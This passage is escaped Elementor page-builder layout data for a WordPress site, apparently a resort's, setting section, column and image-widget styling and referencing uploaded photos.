0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ad7d8d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad470d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86f8da6\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"06051df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-009.jpg\",\"id\":340},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ad64e1\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"structure\":\"40\",\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9407d0d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9681148\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4cb9f69\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"a15b9be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2026256\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"07237f5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f6e053a\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"bc25866\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-012.jpg\",\"id\":341},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\